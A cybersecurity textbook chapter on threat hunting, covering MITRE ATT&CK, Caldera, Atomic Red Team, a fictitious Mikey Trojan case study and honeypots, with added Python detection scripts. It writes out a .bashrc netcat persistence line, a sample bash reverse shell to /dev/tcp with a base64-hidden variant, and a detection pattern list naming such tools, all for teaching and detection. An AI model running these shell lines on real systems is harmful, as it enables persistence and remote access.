Chapter 15. Introduction to Threat Hunting

This chapter covers the following topics:

What Is Threat Hunting?

The Threat-Hunting Process

Threat Hunting and MITRE’s ATT&CK

Threat-Hunting Case Study

Threat Hunting, Honeypots, Honeynets, and Active Defense

No security product or technology in the world can detect and block all security threats in the continuously evolving threat landscape (regardless of the vendor or how expensive it is). This is why many organizations task senior analysts in their computer security incident response team (CSIRT) and their security operations center (SOC) with hunting for threats that may have bypassed the security controls that are in place. Threat hunting is the act of proactively and iteratively searching your organization's systems and networks for threats that existing controls have not detected. This chapter covers threat-hunting practices, the operational challenges of a threat-hunting program, and the benefits of a threat-hunting program.

“Do I Know This Already?” Quiz

The “Do I Know This Already?” quiz allows you to assess whether you should read this entire chapter thoroughly or jump to the “Exam Preparation Tasks” section. If you are in doubt about your answers to these questions or your own assessment of your knowledge of the topics, read the entire chapter. Table 15-1 lists the major headings in this chapter and their corresponding “Do I Know This Already?” quiz questions. You can find the answers in Appendix A, “Answers to the ‘Do I Know This Already?’ Quizzes and Review Questions.”

Table 15-1 “Do I Know This Already?” Section-to-Question Mapping

1. Which of the following statements about threat hunting is true?

a. Threat hunting is only performed by engineers outside the security operations center (SOC).

b. The hunting process requires deep knowledge of the network and is mostly performed by ethical hackers, penetration testers, or red team members who have deep knowledge of how attackers create malware.

c. The hunting process requires deep knowledge of the network and often is performed by SOC analysts (otherwise known as investigators, threat hunters, tier 2 or tier 3 analysts, and so on).

d. None of these answers are correct.

2. Threat hunting starts with a trigger based on which of the following?

a. An anomaly in the network

b. Threat intelligence

c. A hypothesis

d. All of the answers are correct.

3. Which of the following includes information about the tactics and techniques that adversaries use while preparing for an attack, including gathering of information (open-source intelligence [OSINT], technical and people weakness identification, and more)?

a. MITRE’s ATT&CK for Enterprise

b. MITRE’s PRE-ATT&CK

c. MITRE’s CWE

d. All of these answers are correct.

4. Which of the following is an open-source tool that can be used to collect and analyze threat intelligence, as well as document investigations and adversarial campaigns?

a. Caldera

b. Atomic Red Team

c. MITRE ATT&CK Navigator

d. Yeti

5. Which of the following techniques can provide all necessary information to conduct a system-specific threat hunt?

a. Honeypots

b. Honeynets

c. Automated adversarial emulation

d. None of these answers are correct.

Foundation Topics

What Is Threat Hunting?

No firewall, intrusion prevention system (IPS), data loss prevention (DLP) system, cloud security service, machine learning model, or any other security product will ever be perfect or able to detect and block every evolving cybersecurity threat. This is why many organizations task their analysts with hunting for threats that the security controls in place did not detect or block.

The hunting process requires deep knowledge of the network and often is performed by SOC analysts (otherwise known as investigators, threat hunters, tier 2 or tier 3 analysts, and so on). Figure 15-1 illustrates the traditional SOC tiers and where threat hunters typically reside. In some organizations (especially small organizations), threat hunting could be done by anyone in the SOC because the organization might not have a lot of resources (analysts). The success of threat hunting completely depends on the maturity of the organization and the resources available (more on this later in this chapter).

Figure 15-1 SOC Tiers and Threat Hunting

Some organizations might have a dedicated team within or outside the SOC to perform threat hunting. However, one of the common practices is to have the hunters embedded within the SOC. Figure 15-2 shows how threat hunters can be structured as a dedicated team.

Figure 15-2 Threat-Hunting Dedicated Team

Threat hunters assume that an attacker has already compromised the network. From that assumption they form a hypothesis about what may be compromised and how an adversary could have carried out the attack. For a hunt to succeed, hunters need to know the tactics, techniques, and procedures (TTPs) that modern adversaries use, which is why many organizations use MITRE’s ATT&CK framework to learn about adversary tactics and techniques. You will learn more about how ATT&CK can be used in threat hunting later in this chapter.

Threat hunting is not a new concept. Many organizations have performed threat hunting for a long time. However, in the last decade many organizations have recognized that they either have to implement a threat-hunting program or enhance their existing program to better defend their organization.

Threat Hunting vs. Traditional SOC Operations vs. Vulnerability Management

Threat hunting is not the same as the traditional (reactive) SOC incident response activities. It is also not the same as vulnerability management (the process of identifying, prioritizing, and remediating, typically by patching, vulnerabilities across the systems and network of your organization, including cloud-based applications in some cases). However, some of the same tools and capabilities may be shared among threat hunters, SOC analysts, and vulnerability management teams. Figure 15-3 shows how tools and other capabilities such as data analytics, TTPs, vulnerability feeds, and threat intelligence feeds may be used across the different teams and analysts in an organization.

Figure 15-3 Example of Tools and Feeds Used by the SOC, Threat Hunters, and Vulnerability Management Teams

Vulnerability management teams often use other tools, such as vulnerability scanners, software composition analysis (SCA) tools, and many others, that the traditional SOC may not use but that threat hunters sometimes do. Which tools are used depends on what the hunters are looking for and on the hypothesis (and scenario).

The Threat-Hunting Process

There is no one-size-fits-all threat-hunting process; however, there are several common practices among mature organizations on how to perform threat hunting. Figure 15-4 shows a high-level threat-hunting process.

Figure 15-4 Example of a Threat-Hunting Process

A high-level threat hunting process includes the following steps:

1. Threat hunting starts with a trigger based on an anomaly, threat intelligence, or a hypothesis (what could an attacker have done to the organization?). At that point you should ask yourself: “Do we really need to perform this threat-hunting activity?” and “What is the scope?”

2. Then you identify the necessary tools and methodologies to conduct the hunt.

3. Once the tools and methodologies are in place, you run the hunt and reveal new attack patterns, TTPs, and so on.

4. You refine your hunting tactics and enrich them using data analytics. Steps 2–3 can take one cycle or be iterative and involve multiple loops (depending on what you find and what additional data and research are needed).

5. A successful outcome is that you identify and mitigate the threat. However, you need to recognize that this is not always the outcome: you might not have the necessary tools and capabilities, or there may have been no actual threat. This is why the success of your hunting program depends on the maturity of your capabilities and of the organization as a whole.

Threat-Hunting Maturity Levels

You can measure the maturity of your threat-hunting program within your organization in many ways. Figure 15-5 shows a matrix that can be used to evaluate the maturity level of your organization against different high-level threat-hunting elements.

Figure 15-5 Threat-Hunting Maturity Levels

These threat-hunting maturity levels can be categorized as simply as level 1, 2, and 3, or more complex measures can be used. You can then use graphs like the ones illustrated in Figure 15-6 to measure your organization’s maturity in each of the elements or categories.

Figure 15-6 Measuring the Threat-Hunting Maturity

Threat Hunting and MITRE’s ATT&CK

In Chapter 14, “Classifying Intrusion Events into Categories,” you learned that you can use MITRE’s ATT&CK framework to learn about the tactics and techniques that attackers use during their campaigns. The information in ATT&CK can be extremely useful for threat hunting.

ATT&CK (https://attack.mitre.org) is a collection of different matrices of tactics and techniques. PRE-ATT&CK (https://attack.mitre.org/tactics/pre) includes the tactics and techniques that adversaries use while preparing for an attack, including gathering of information (open-source intelligence [OSINT], technical and people weakness identification, and more). Note that MITRE has since retired PRE-ATT&CK as a separate matrix and folded its content into the Enterprise matrix as the Reconnaissance and Resource Development tactics, so on current versions of the site you will find that material there.

Figure 15-7 shows the life of a cyber attack and how MITRE’s PRE-ATT&CK and ATT&CK outline each technique. Keep in mind that this list is not complete because MITRE adds information to ATT&CK on an ongoing basis.

Figure 15-7 The Life of a Cyber Attack, PRE-ATT&CK, and ATT&CK

As you can see, learning about the different adversary tactics and techniques is useful when threat hunting and also in other areas of cyber defense, as well as offensive security (penetration testing/ethical hacking).

MITRE also maintains a list of software (tools and malware) that adversaries use to carry out their attacks, available at https://attack.mitre.org/software, with a detailed entry for each tool or malware family. For example, Figure 15-8 shows the well-known memory-scraping and credential-dumping tool Mimikatz in the MITRE ATT&CK Navigator. The Navigator highlights every tactic and technique in which Mimikatz has been observed across the many intrusions and threat actors that MITRE tracks.

Figure 15-8 Mimikatz Example in the MITRE ATT&CK Navigator

The MITRE ATT&CK Navigator allows you to export each layer (in this case, the techniques used by Mimikatz) as a machine-readable JSON file. Example 15-1 shows that JSON file, listing the techniques and tactics where the Mimikatz tool has been used. The comment field of each technique entry describes how Mimikatz implements that technique.

Example 15-1 MITRE ATT&CK Tactics and Techniques in JSON

{
        "name": "Mimikatz (S0002)",
        "version": "2.2",
        "domain": "mitre-enterprise",
        "description": "Enterprise techniques used by Mimikatz, ATT&CK software S0002 v1.1",
        "filters": {
                "stages": [
                        "act"
                ],
                "platforms": [
                        "Windows",
                        "Linux",
                        "macOS"
                ]
        },
        "sorting": 0,
        "viewMode": 0,
        "hideDisabled": false,
        "techniques": [
                {
                        "techniqueID": "T1098",
                        "tactic": "credential-access",
                        "score": 1,
                        "color": "",
                        "comment": "The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.[2][7]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1098",
                        "tactic": "persistence",
                        "score": 1,
                        "color": "",
                        "comment": "The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.[2][7]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1003",
                        "tactic": "credential-access",
                        "score": 1,
                        "color": "",
                        "comment": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA, SAM table, credential vault, DCSync/NetSync, and DPAPI.[1][8][5][4]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1081",
                        "tactic": "credential-access",
                        "score": 1,
                        "color": "",
                        "comment": "Mimikatz's DPAPI module can harvest protected credentials stored and/or cached by browsers and other user applications by interacting with Windows cryptographic application programming interface (API) functions.[2][5]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1207",
                        "tactic": "defense-evasion",
                        "score": 1,
                        "color": "",
                        "comment": "Mimikatz’s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC.[1][2]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1075",
                        "tactic": "lateral-movement",
                        "score": 1,
                        "color": "",
                        "comment": "Mimikatz's SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands.[2][4]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1097",
                        "tactic": "lateral-movement",
                        "score": 1,
                        "color": "",
                        "comment": "Mimikatz’s LSADUMP::DCSync, KERBEROS::Golden, and KERBEROS::PTT modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.[2][3][6][4]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1145",
                        "tactic": "credential-access",
                        "score": 1,
                        "color": "",
                        "comment": "Mimikatz's CRYPTO::Extract module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.[2]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1101",
                        "tactic": "persistence",
                        "score": 1,
                        "color": "",
                        "comment": "The Mimikatz credential dumper contains an implementation of an SSP.[1]",
                        "enabled": true,
                        "metadata": []
                },
                {
                        "techniqueID": "T1178",
                        "tactic": "privilege-escalation",
                        "score": 1,
                        "color": "",
                        "comment": "Mimikatz's MISC::AddSid module can appended any SID or user/group account to a user's SID-History. Mimikatz also utilizes SID-History Injection to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.[2][3]",
                        "enabled": true,
                        "metadata": []
                }
        ],
        "gradient": {
                "colors": [
                        "#ffffff",
                        "#66b1ff"
                ],
                "minValue": 0,
                "maxValue": 1
        },
        "legendItems": [
                {
                        "color": "#66b1ff",
                        "label": "used by Mimikatz"
                }
        ],
        "metadata": [],
        "showTacticRowBackground": false,
        "tacticRowBackground": "#dddddd",
        "selectTechniquesAcrossTactics": true
}
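The Navigator layer is plain JSON, so a hunter can turn it directly into a hunt list. The following is an added example (not part of the original chapter or of MITRE’s tooling) that reads a layer in the shape of Example 15-1, groups the enabled techniques by tactic, and subtracts the techniques the SOC already has detections for. The embedded layer is a constructed subset of Example 15-1 (with one entry deliberately disabled to show the filter), and the set of already-detected techniques passed to coverage_gaps is an assumption.

```python
import json
from collections import defaultdict

# Constructed excerpt in the shape of the Navigator layer in Example 15-1
# (a subset of its entries; T1178 is disabled here only to exercise the filter).
SAMPLE_LAYER = """{
  "name": "Mimikatz (S0002)",
  "domain": "mitre-enterprise",
  "techniques": [
    {"techniqueID": "T1098", "tactic": "credential-access", "score": 1, "enabled": true},
    {"techniqueID": "T1098", "tactic": "persistence", "score": 1, "enabled": true},
    {"techniqueID": "T1003", "tactic": "credential-access", "score": 1, "enabled": true},
    {"techniqueID": "T1075", "tactic": "lateral-movement", "score": 1, "enabled": true},
    {"techniqueID": "T1097", "tactic": "lateral-movement", "score": 1, "enabled": true},
    {"techniqueID": "T1178", "tactic": "privilege-escalation", "score": 1, "enabled": false}
  ]
}"""


def load_layer(text):
    """Parse a Navigator layer export (JSON text) into a dict."""
    return json.loads(text)


def techniques_by_tactic(layer):
    """Group enabled technique IDs by tactic, both sorted, from a layer dict."""
    grouped = defaultdict(set)
    for entry in layer.get("techniques", []):
        if not entry.get("enabled", True):
            continue  # disabled cells are not part of the hunt
        grouped[entry["tactic"]].add(entry["techniqueID"])
    return {tactic: sorted(ids) for tactic, ids in sorted(grouped.items())}


def unique_techniques(layer):
    """Every enabled technique ID in the layer, deduplicated across tactics
    (T1098 appears under two tactics in Example 15-1 but is one technique)."""
    return sorted({t for ids in techniques_by_tactic(layer).values() for t in ids})


def coverage_gaps(layer, covered):
    """Technique IDs the layer marks as used by the tool but for which the SOC
    has no detection content. `covered` is that (assumed) set of technique IDs;
    what remains is the list to hunt for."""
    covered = set(covered)
    return [t for t in unique_techniques(layer) if t not in covered]


if __name__ == "__main__":
    layer = load_layer(SAMPLE_LAYER)
    for tactic, ids in techniques_by_tactic(layer).items():
        print(f"{tactic:22} {', '.join(ids)}")
    # Assumed: the SOC already has detections for T1003 and T1098.
    print("hunt for:", coverage_gaps(layer, {"T1003", "T1098"}))
```

The same functions work unchanged on a full layer downloaded from the Navigator; only the embedded sample is abbreviated.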

Automated Adversarial Emulation

MITRE and others in the industry have created several open-source tools to provide automated adversary emulation that can also help with some aspects of threat hunting. Caldera is one of those tools. Caldera was originally created by MITRE, but many security experts across the industry contribute to it. You can download Caldera from https://github.com/mitre/caldera.

Caldera is divided into different architectural components:

• Caldera Core services (including TTPs, command and control, and other capabilities)

• Plug-ins

• Agents that can run in Linux, Windows, and macOS

Figure 15-9 shows the components of Caldera’s architecture.

Figure 15-9 Caldera’s Architecture

Caldera’s default plug-in is 54ndc47 (Sandcat), which supplies the default agent (written in Go) that runs on Linux, Windows, and macOS. Figure 15-10 shows the main Caldera dashboard and the list of its components.

Figure 15-10 Caldera’s Components

Figure 15-11 shows the 54ndc47 agent options for agents running in different operating systems. These agents communicate with the core Caldera system and execute adversary emulation techniques and tactics.

Figure 15-11 54ndc47 Agent Options

Figure 15-12 shows an agent connected to the system. In this case, it is a Linux system with the host name victim-dio-1. 

Figure 15-12 An Agent Connected to Caldera

Caldera enables you to simulate different types of adversaries that have different capabilities (tactics and techniques) that can be run against a system. Figure 15-13 shows how you can select from a predefined list of attacker/adversary profiles or create or customize a profile.

Figure 15-13 Caldera Adversary Profiles

After you connect your agents and set up the adversary profiles, you can create a Caldera operation. In Figure 15-14, a new operation with the name omar-super-secret-op-1 is created to launch automated attacks against the Caldera agents.

Figure 15-14 Caldera Operations


Tip

You can find Caldera’s full documentation and tutorials at https://caldera.readthedocs.io/en/latest.


Atomic Red Team is another tool/ecosystem that can be used to perform automated adversary emulation. It is a collection of small, self-contained tests for adversarial techniques, each mapped to MITRE’s ATT&CK, documented on GitHub (https://github.com/redcanaryco/atomic-red-team). Example 15-2 shows a basic technique in which an adversary appends an arbitrary shell command to a user’s shell startup file to gain persistence: every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc script runs, and so does the injected command.

Example 15-2 Adding a Malicious Command to .bashrc

echo "nc -lvp 1337" >> ~/.bashrc

In Example 15-2 the attacker appends a line to the user’s .bashrc that starts a Netcat (nc) listener on TCP port 1337 each time a shell is opened. Atomic Red Team includes hundreds of these tests in a machine-readable (YAML) format so that you can integrate them with other tools or build new ones.
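The hunt for this technique is the mirror image of the attack: read every user’s shell startup files and flag lines that have no business in a login script. The following is an added example written for that purpose (it is not part of the chapter or of Atomic Red Team); the sample .bashrc content is constructed to contain the line from Example 15-2 plus two other common persistence variants, and the pattern list is a starting point rather than an exhaustive one.

```python
import os
import re

# Constructed sample ~/.bashrc: three benign lines followed by three injected
# ones (the Example 15-2 listener, a bash reverse shell, a base64-hidden command).
SAMPLE_BASHRC = """# constructed sample ~/.bashrc for the hunt
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
nc -lvp 1337
bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
eval "$(echo bmMgLWx2cCAxMzM3 | base64 -d)"
"""

# Startup files that run on login or on a new interactive shell.
RC_FILES = (".bashrc", ".bash_profile", ".profile", ".bash_login", ".zshrc")

# Each pattern is something a legitimate login script should never contain;
# the second element is the reason recorded for the hit.
PATTERNS = [
    (re.compile(r"\b(nc|ncat|netcat)\b"), "netcat invocation"),
    (re.compile(r"/dev/tcp/|/dev/udp/"), "bash network redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive shell spawned"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"), "download piped to shell"),
    (re.compile(r"(^|\s)(source|\.)\s+/(tmp|dev/shm|var/tmp)/"), "sources script from scratch dir"),
]


def suspicious_lines(text):
    """Return [(line_number, line, [reasons])] for lines matching any pattern.

    Comment-only lines are skipped so that a comment documenting a technique
    is not reported as the technique itself.
    """
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = [why for pattern, why in PATTERNS if pattern.search(line)]
        if reasons:
            hits.append((number, line, reasons))
    return hits


def scan_home(home):
    """Run suspicious_lines over every shell startup file in one home directory.
    Returns {path: hits}; unreadable or absent files are skipped."""
    findings = {}
    for name in RC_FILES:
        path = os.path.join(home, name)
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_lines(fh.read())
        except OSError:
            continue
        if hits:
            findings[path] = hits
    return findings


if __name__ == "__main__":
    for number, line, reasons in suspicious_lines(SAMPLE_BASHRC):
        print(f"line {number}: {line}  <- {', '.join(reasons)}")
    # Live hunt over the current user's home; for a fleet-wide hunt, run this
    # from the endpoint agent against every directory under /home and /root.
    for path, hits in scan_home(os.path.expanduser("~")).items():
        print(path, [h[0] for h in hits])
```

The listener from Example 15-2 is caught by the first pattern; the reverse shell on line 5 trips two patterns at once, and the base64-wrapped copy of the same command is caught by the decode pattern even though the string nc never appears in clear text. Treat every hit as a lead to confirm, not as a verdict: developers do occasionally put odd things in their dotfiles.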

The next section provides a case study of a threat-hunting scenario triggered by threat intelligence and using many of the resources that you have learned throughout this book.

Threat-Hunting Case Study

Suppose you are part of a threat-hunting team that received a tip from a business partner indicating that they experienced an attack by a sophisticated adversary (APT1). The attack involved new variants of the Win.Trojan.Mikey-7914350-0 Trojan.


Note

This is a fictitious scenario used only to demonstrate the threat-hunting process from a high-level perspective.


Figure 15-15 shows the high-level steps followed in this threat-hunting scenario.

Figure 15-15 Threat-Hunting Scenario High-Level Steps

You quickly use MITRE’s ATT&CK Navigator to see more information about TTPs used by APT1, as demonstrated in Figure 15-16.

Figure 15-16 APT1 in MITRE’s ATT&CK Navigator

You also search the Cisco Talos blog and obtain additional information about this Trojan. After reviewing additional threat intelligence from Talos, you learn that Mikey is a Trojan that installs itself on the system, collects information, and communicates with a command and control (CnC or C2) server, potentially exfiltrating sensitive information. It can also receive additional commands and perform other malicious actions on the system, such as installing additional malware on request. You do a quick query in your SIEM, find nothing related to this threat, and decide to create the hypothesis for the threat hunt.

Your hypothesis is that some Windows systems that host sensitive information may have been compromised. Then you deep-dive into trying to reveal new patterns, tactics, techniques, and procedures. From analyzing more details about the Mikey Trojan, you learn that the malware has several variants matching the hashes in Example 15-3.

Example 15-3 Mikey Trojan-Associated Hashes

    "Win.Trojan.Mikey-7914350-0": {
        "bis": [
            {
                "bi": "pe-encrypted-section",
                "hashes": [
                    "37dae85fa1f091a9c4270b77c628f46f559a8ed9d7a8302278ed348fbfa9fec0",
                    "049c2426192d0e9d1fc2db3ebd48e07166dab4e0c840b22d0f45ede076f61389",
                    "01bc3645259d6553ae26142e215713d74a4ab9b72ce70a0e407ef0b0c24f3a78",
                    "3d7043f6f4bd7a68f0829df9bacf696dc7e9ea36f5642a35efc197b98612f0e5",
                    "378819dbd951424471777f89811e16d58010b1161254b4b74bdf487861e5a5f7",
                    "1930371eb1a0cec8e5b7311f5476053304cff52572d3304cb71044159d7711ed",
                    "3bd0b289aa4a812494c325fe9364eacbc1e800e312d9048db9bc48c49ced3523",
                    "44a965a9c0f214704c2cd8c993ed701347e0fcd81132d4ee7085b22fe5031d48",
                    "341822381fec4eaec4d7735ccd63c250f7a93caab334cd6b44d3a7c7f623ef39",
                    "22ff13fa4513f554f10b6a38ee3f642cb2996788e4c6c4cfbed2962118ef73fd",
                    "0f07c570d967fdd014a1990c6b0bddaa8d0e096841faa93f3afdc1f55779d868",
                    "21eb0a07f6cbdaa846bc90ada59c653873674d1c417e86bad60619f28ce86102",
                    "2c35fea69feeff1bd9031260d8c11a46473c82fb5be8cbe185eb486fb5f72c84",
                    "19b2f654cd22a980242d96f861693c1a0d838df3d3627fb5247edf615badedea",
                    "46d1fa84a261bf0f281f59544a2d5175091c2a672864ed93301558cd80b82b3f",
                    "346a4804c4c61e3573b96fbfc1c3912087f2f68c01e4d50ba24e1e80c3aad02f",
                    "31eeee772b983f6553c1721920e8a9c4ffd4f9c9197ab8161d278347ac538f0a",
                    "1be801bcfc361a65283c4e8d07d2217d35a5ba9d356496a6c4f87043fc356f58",
                    "0d8f3110fbd771989644939a3b0fcff866870ff88c05df7ee5a1235e4c4749f8",
                    "19f84524d2718c165108376091927e42b63e2c8da8c2f92a37ae4c9c8d9275da",
                    "2b307f42f7cf30065cce12063b3bcb8803a1e19d4aa73792f440b0f80c91fcf3",
                    "2c45116ab57056f76d28d7a8929f1033bfdaaaaf2bf4a443ff150d75ae2b6013",
                    "4c044cec574a1b83c341b25e2b3febec0955e3d8163f3ecd3c3ccfff800f0608",
                    "1627c2372a603ac231a8709998ab1bf1096dea2e014cadd145afcf1dc550337e",
                    "20edee9146f0772dac4efb13e92b9aa0c267c95ae509d751c8a991f0a95d0d2b"
                ],
                "mitre_attack_tags": [
                    "TA0005",
                    "T1027"
                ]
            },

The hashes shown in Example 15-3 are a subset of a large JSON file that includes additional threat intelligence about related malware. You can obtain the complete JSON file from https://github.com/The-Art-of-Hacking/h4cker/blob/master/cyberops/mikey-trojan-threat-report.json. The JSON output in Example 15-3 also carries two MITRE ATT&CK tags: TA0005 (the Defense Evasion tactic) and T1027 (the Obfuscated Files or Information technique), which is consistent with the encrypted PE section the report describes. The same threat intelligence JSON file reveals the Windows Registry keys that were modified by the Mikey Trojan (shown in Example 15-4).

Example 15-4 Registry Keys Modified by the Mikey Trojan

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{F3F18253-2050-E690-FED7-0BE7DF1E790D}
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{F3F18253-2050-E690-FED7-0BE7DF1E790D}\ENUM

You create a quick script that searches for the Registry keys in Example 15-4 and for files whose SHA-256 hashes match any of the hashes shown in Example 15-3, and you find two compromised systems. You discover that the adversaries used different methods to obfuscate commands executed from the malware payload: environment variables, aliases, and specific shell semantics were used to evade signature-based detection and application whitelisting (allowlisting) mechanisms.
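A script of that kind, as an added example (it is not the chapter’s or Talos’s code): it loads a JSON threat report in the shape of Example 15-3, flattens every hash list into one set, walks a directory tree comparing SHA-256 digests against that set, and, on Windows, checks whether the Registry keys from Example 15-4 (with the path separators restored) exist under HKCU. The report excerpt and the files created in demo() are constructed; on non-Windows hosts the Registry check is skipped because the winreg module is unavailable there.

```python
import hashlib
import json
import os
import tempfile

# Constructed excerpt in the shape of mikey-trojan-threat-report.json as shown in
# Example 15-3 (the two hashes are the first two listed there).
SAMPLE_REPORT = """{
  "Win.Trojan.Mikey-7914350-0": {
    "bis": [
      {
        "bi": "pe-encrypted-section",
        "hashes": [
          "37dae85fa1f091a9c4270b77c628f46f559a8ed9d7a8302278ed348fbfa9fec0",
          "049c2426192d0e9d1fc2db3ebd48e07166dab4e0c840b22d0f45ede076f61389"
        ],
        "mitre_attack_tags": ["TA0005", "T1027"]
      }
    ]
  }
}"""

# The two keys from Example 15-4, written relative to HKCU with backslashes.
MIKEY_REGISTRY_KEYS = (
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup"
    r"\Component Categories\{F3F18253-2050-E690-FED7-0BE7DF1E790D}",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup"
    r"\Component Categories\{F3F18253-2050-E690-FED7-0BE7DF1E790D}\Enum",
)


def load_hashes(report):
    """Flatten every 'hashes' list under every family/behaviour into one lowercase set."""
    iocs = set()
    for family in report.values():
        for behaviour in family.get("bis", []):
            iocs.update(h.lower() for h in behaviour.get("hashes", []))
    return iocs


def sample_iocs():
    return load_hashes(json.loads(SAMPLE_REPORT))


def sha256_file(path, chunk=1 << 20):
    """Stream the file through SHA-256 so large binaries do not land in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def scan_tree(root, iocs):
    """Walk root and return [(path, sha256)] for every file whose digest is an IOC."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:  # locked or unreadable file: skip it, keep hunting
                continue
            if digest in iocs:
                hits.append((path, digest))
    return hits


def check_registry(keys=MIKEY_REGISTRY_KEYS):
    """Return the keys that exist under HKCU. Only meaningful on Windows; elsewhere
    winreg does not exist and the check is skipped (returns an empty list)."""
    try:
        import winreg
    except ImportError:
        return []
    present = []
    for key in keys:
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key):
                present.append(key)
        except OSError:
            pass
    return present


def demo():
    """Exercise scan_tree on a constructed directory: one benign file and one file
    whose hash is deliberately added to the IOC set to stand in for a Mikey sample."""
    iocs = sample_iocs()
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "notes.txt"), "w") as fh:
            fh.write("nothing to see here\n")
        planted = os.path.join(root, "svchost_update.exe")
        with open(planted, "wb") as fh:
            fh.write(b"MZ\x90\x00constructed-sample-not-real-malware")
        iocs.add(sha256_file(planted))  # simulate the hash being in the report
        return [os.path.basename(p) for p, _ in scan_tree(root, iocs)]


if __name__ == "__main__":
    print("IOC hashes loaded:", len(sample_iocs()))
    print("matches in demo tree:", demo())
    print("Mikey registry keys present:", check_registry())
```

In a real hunt you would point scan_tree at the paths the report names (or at the whole volume, accepting the I/O cost) on each host and ship the hits and the Registry results back to the SIEM; a hash match is high-confidence but brittle, so pair it with the TA0005/T1027 behaviours the report tags rather than relying on hashes alone.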

In addition, you observe that the attacker encrypted the information gathered from the compromised system and hid it inside an image file before exfiltrating the image to a C2 server. This technique had not been observed by your business partner or reported in any other threat intelligence you reviewed. After you remediate the compromised systems and recover from the attack, you create a new threat intelligence document using the Structured Threat Information Expression (STIX) format (in JSON) and share it with your business partner using Trusted Automated Exchange of Intelligence Information (TAXII).


Tip

You can obtain different examples of STIX documents at https://oasis-open.github.io/cti-documentation/stix/examples. Several open-source tools can be used to obtain threat intelligence from different sources, as well as to document incidents and attack campaigns. One of the most popular is Yeti. Yeti is a tool that helps you organize threat intelligence, indicators of compromise, and adversary TTPs in a single, unified repository. You can download Yeti from https://github.com/yeti-platform/yeti. Figure 15-17 shows threat intelligence information in Yeti. In Figure 15-17, the analyst searched for any threat intelligence tagged as a Windows executable (tag=exe).


Figure 15-17 Yeti’s Threat Intelligence Examples

Threat Hunting, Honeypots, Honeynets, and Active Defense

In some cases, hypothesis-based threat hunting is a “needle in a haystack” problem, and the hunt may require a lot of manual work if you do not have tools to automate parts of it. For many years, security professionals have used honeypots and honeynets to help detect attacks and learn adversary TTPs. Instead of searching the logs of many busy systems across your organization or in the cloud, you watch only one decoy system (a honeypot) or a collection of decoys (a honeynet), where any interaction at all is suspicious. On the other hand, a honeypot or honeynet on its own is not sufficient nowadays. Honeypots and honeynets are useful only if an adversary interacts with them, and sophisticated attackers have ways to tell that a system is a decoy. For instance, if a supposed domain admin account on the decoy accepts a default password, it becomes immediately obvious. Attackers and malware can also detect that the system shows no changes in CPU utilization, mouse movements, clipboard contents, and other typical behaviors of a real end-user system.

Some organizations have introduced the concept of "honeypotting as a service": essentially, you can buy on-demand honeypot services that reduce the time and effort required to set up and monitor a honeypot. Another concept that has emerged throughout the years is the concept of adaptive honeypots and active security defense. Active defense involves actively responding to adversaries once detected. The nature and scope of the response can vary. It could be that you enhance your monitoring capabilities or that you isolate attackers to one area of your network to learn their TTPs. Some people confuse honeypots/honeynets and active defense with threat hunting. From previous examples in this chapter, you have learned that they are not the same thing.


Tip

The Honeynet Project is an international nonprofit organization that helps develop open-source tools that can be used to analyze adversarial tactics and techniques against intentionally vulnerable systems. The Honeynet Project has chapters around the world. Information about the Honeynet Project can be obtained from its website at https://www.honeynet.org.


Throughout this book you have learned that cybersecurity operations (CyberOps) is not just one method or technique. It is a practice that will continue to evolve throughout the years as attackers become more sophisticated and technology continues to progress. The concepts that you learned in this book and the CyberOps Associates certification will help you get a good foundation and prepare you to better defend your network and underlying systems.

Exam Preparation Tasks

Review All Key Topics

Review the most important topics in this chapter, noted with the Key Topics icon in the outer margin of the page. Table 15-2 lists these key topics and the page numbers on which each is found.

Table 15-2 Key Topics for Chapter 15

Define Key Terms

Define the following key terms from this chapter and check your answers in the glossary:

threat hunting

Yeti

Caldera

